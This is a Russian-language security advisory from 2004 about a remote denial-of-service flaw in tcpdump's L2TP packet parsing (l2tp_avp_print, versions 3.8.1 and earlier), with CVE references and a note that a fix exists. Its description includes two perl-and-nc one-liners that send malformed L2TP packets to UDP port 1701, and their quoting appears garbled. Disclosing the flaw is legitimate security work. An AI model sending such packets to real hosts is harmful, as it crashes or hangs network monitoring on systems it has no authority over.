Уязвимость в tcpdump в обработке L2TP пакетов

Дата публикации:
21.01.2004
Всего просмотров:
1144
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2003-0989
CVE-2003-1029
CVE-2004-0055
CVE-2004-0057
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
tcpdump 3.x
Уязвимые версии: Tcpdump 3.8.1 и более ранние версии

Описание: Уязвимость обнаружена в tcpdump в обработке L2TP пакетов. Удаленный пользователь может аварийно завершить работу tcpdump

Удаленный пользователь может послать специально обработанный L2TP пакет, не определяя длину параметров, чтобы заставить программу войти в бесконечный цикл или аварийно завершить ее работу. Уязвимость связанна с ошибкой в функции l2tp_avp_print():

perl -e 'print .\x80\x02...\x00.x6 | nc -u 10.1.1.1 1701
perl -e 'print .\x80\x00...\x00.x6 . .\x01.' | nc -u 10.1.1.1 1701

URL производителя: http://www.tcpdump.org

Решение:Производитель выпустил обновление, доступное через CVS.

Ссылки: Seg fault of tcpdump (v 3.8.1 and below) with malformed

или введите имя

CAPTCHA